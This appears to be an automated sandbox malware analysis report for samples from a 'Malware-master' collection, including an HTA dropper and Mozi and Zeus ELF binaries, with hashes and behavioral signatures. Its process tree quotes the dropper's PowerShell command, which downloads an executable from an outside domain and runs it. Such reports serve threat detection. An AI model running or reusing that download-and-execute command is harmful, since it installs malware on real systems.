Overview
overview
10Static
static
10Malware-ma...er.hta
windows7-x64
3Malware-ma...er.hta
windows10-2004-x64
8Malware-ma...075.js
windows7-x64
1Malware-ma...075.js
windows10-2004-x64
1Malware-ma...jan.js
windows7-x64
1Malware-ma...jan.js
windows10-2004-x64
1Malware-ma...Mozi.m
debian-9-armhf
9Malware-ma...Mozi.a
debian-9-mips
8Malware-ma...Mozi.m
debian-9-mipsel
1Malware-ma...us.arm
debian-9-armhf
9Malware-ma.../ELF/e
ubuntu-18.04-amd64
Malware-ma.../ELF/f
ubuntu-18.04-amd64
1Malware-ma...rmfile
ubuntu-18.04-amd64
10Malware-ma.../ELF/m
ubuntu-18.04-amd64
6Malware-ma...ELF/m1
ubuntu-18.04-amd64
6Malware-ma...F/m68k
ubuntu-18.04-amd64
Malware-ma...F/m68k
debian-9-armhf
Malware-ma...F/m68k
debian-9-mips
Malware-ma...F/m68k
debian-9-mipsel
Malware-ma...F/mips
debian-9-mips
9Malware-ma...LF/ppc
ubuntu-18.04-amd64
Malware-ma...LF/ppc
debian-9-armhf
Malware-ma...LF/ppc
debian-9-mips
Malware-ma...LF/ppc
debian-9-mipsel
Malware-ma...LF/sh4
ubuntu-18.04-amd64
Malware-ma...LF/sh4
debian-9-armhf
Malware-ma...LF/sh4
debian-9-mips
Malware-ma...LF/sh4
debian-9-mipsel
Malware-ma...LF/x86
ubuntu-18.04-amd64
10Malware-ma...oad.js
windows7-x64
1Malware-ma...oad.js
windows10-2004-x64
1Malware-ma...e64.js
windows7-x64
1Analysis
-
max time kernel
93s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
26-12-2023 07:03
Behavioral task
behavioral1
Sample
Malware-master/HTML,HTM, HTA Exploit/New Order.hta
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
Malware-master/HTML,HTM, HTA Exploit/New Order.hta
Resource
win10v2004-20231222-en
Behavioral task
behavioral3
Sample
Malware-master/HTML,HTM, HTA Exploit/html-trojan-agent-37075.js
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
Malware-master/HTML,HTM, HTA Exploit/html-trojan-agent-37075.js
Resource
win10v2004-20231222-en
Behavioral task
behavioral5
Sample
Malware-master/HTML,HTM, HTA Exploit/trojan.js
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
Malware-master/HTML,HTM, HTA Exploit/trojan.js
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
Malware-master/Linux/ELF/2021.04.20-Mozi.m
Resource
debian9-armhf-20231222-en
Behavioral task
behavioral8
Sample
Malware-master/Linux/ELF/2021.04.26-Mozi.a
Resource
debian9-mipsbe-20231215-en
Behavioral task
behavioral9
Sample
Malware-master/Linux/ELF/Mozi.m
Resource
debian9-mipsel-20231215-en
Behavioral task
behavioral10
Sample
Malware-master/Linux/ELF/Zeus.arm
Resource
debian9-armhf-20231215-en
Behavioral task
behavioral11
Sample
Malware-master/Linux/ELF/e
Resource
ubuntu1804-amd64-20231215-en
Behavioral task
behavioral12
Sample
Malware-master/Linux/ELF/f
Resource
ubuntu1804-amd64-20231222-en
Behavioral task
behavioral13
Sample
Malware-master/Linux/ELF/frmfile
Resource
ubuntu1804-amd64-20231222-en
Behavioral task
behavioral14
Sample
Malware-master/Linux/ELF/m
Resource
ubuntu1804-amd64-20231215-en
Behavioral task
behavioral15
Sample
Malware-master/Linux/ELF/m1
Resource
ubuntu1804-amd64-20231215-en
Behavioral task
behavioral16
Sample
Malware-master/Linux/ELF/m68k
Resource
ubuntu1804-amd64-20231215-en
Behavioral task
behavioral17
Sample
Malware-master/Linux/ELF/m68k
Resource
debian9-armhf-20231222-en
Behavioral task
behavioral18
Sample
Malware-master/Linux/ELF/m68k
Resource
debian9-mipsbe-20231215-en
Behavioral task
behavioral19
Sample
Malware-master/Linux/ELF/m68k
Resource
debian9-mipsel-20231215-en
Behavioral task
behavioral20
Sample
Malware-master/Linux/ELF/mips
Resource
debian9-mipsbe-20231222-en
Behavioral task
behavioral21
Sample
Malware-master/Linux/ELF/ppc
Resource
ubuntu1804-amd64-20231215-en
Behavioral task
behavioral22
Sample
Malware-master/Linux/ELF/ppc
Resource
debian9-armhf-20231215-en
Behavioral task
behavioral23
Sample
Malware-master/Linux/ELF/ppc
Resource
debian9-mipsbe-20231222-en
Behavioral task
behavioral24
Sample
Malware-master/Linux/ELF/ppc
Resource
debian9-mipsel-20231215-en
Behavioral task
behavioral25
Sample
Malware-master/Linux/ELF/sh4
Resource
ubuntu1804-amd64-20231222-en
Behavioral task
behavioral26
Sample
Malware-master/Linux/ELF/sh4
Resource
debian9-armhf-20231215-en
Behavioral task
behavioral27
Sample
Malware-master/Linux/ELF/sh4
Resource
debian9-mipsbe-20231222-en
Behavioral task
behavioral28
Sample
Malware-master/Linux/ELF/sh4
Resource
debian9-mipsel-20231215-en
Behavioral task
behavioral29
Sample
Malware-master/Linux/ELF/x86
Resource
ubuntu1804-amd64-20231215-en
Behavioral task
behavioral30
Sample
Malware-master/PHP/async-upload.js
Resource
win7-20231215-en
Behavioral task
behavioral31
Sample
Malware-master/PHP/async-upload.js
Resource
win10v2004-20231215-en
Behavioral task
behavioral32
Sample
Malware-master/PHP/class-IXR-base64.js
Resource
win7-20231129-en
General
-
Target
Malware-master/HTML,HTM, HTA Exploit/New Order.hta
-
Size
12KB
-
MD5
0dbe7c34c61b5a8e18246b2788fa463e
-
SHA1
627f2c10f3ff10febb39ca31d583973c7e27fa6a
-
SHA256
cddc4a76493dd94858727d66873d254696eee5cb60f67fe91b0b4b133ecee878
-
SHA512
5f90b089dd0e03b7d7dc0dda9276405bbe8baf03e23a86e98058f7ee16bb1f12846b22763f63c4360b24713453ba3c7daa13cc6b6681e25824c573043e835c21
-
SSDEEP
192:Q6Z7bZI9d9B9h9p9W9h9g90Za9sb9ei/IRr:Q6V2rHnPOnI0EOZIl
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
poweRsHelL.ExEflow pid process 19 3612 poweRsHelL.ExE 32 3612 poweRsHelL.ExE 37 3612 poweRsHelL.ExE -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
poweRsHelL.ExEpid process 3612 poweRsHelL.ExE 3612 poweRsHelL.ExE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
poweRsHelL.ExEdescription pid process Token: SeDebugPrivilege 3612 poweRsHelL.ExE -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
mshta.exedescription pid process target process PID 4312 wrote to memory of 3612 4312 mshta.exe poweRsHelL.ExE PID 4312 wrote to memory of 3612 4312 mshta.exe poweRsHelL.ExE PID 4312 wrote to memory of 3612 4312 mshta.exe poweRsHelL.ExE
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Malware-master\HTML,HTM, HTA Exploit\New Order.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4312 -
C:\Windows\SysWOW64\WindoWsPowerSHELl\v1.0\poweRsHelL.ExE"C:\Windows\SySteM32\WindoWsPowerSHELl\v1.0\poweRsHelL.ExE" " WGet ”escapetopicton.com/wordpress/sedf/New%20order.exe” -OUtfile ”$ENV:temP\windows86.exe” ; StArt ”$enV:TeMp\windows86.exe”"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3612
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82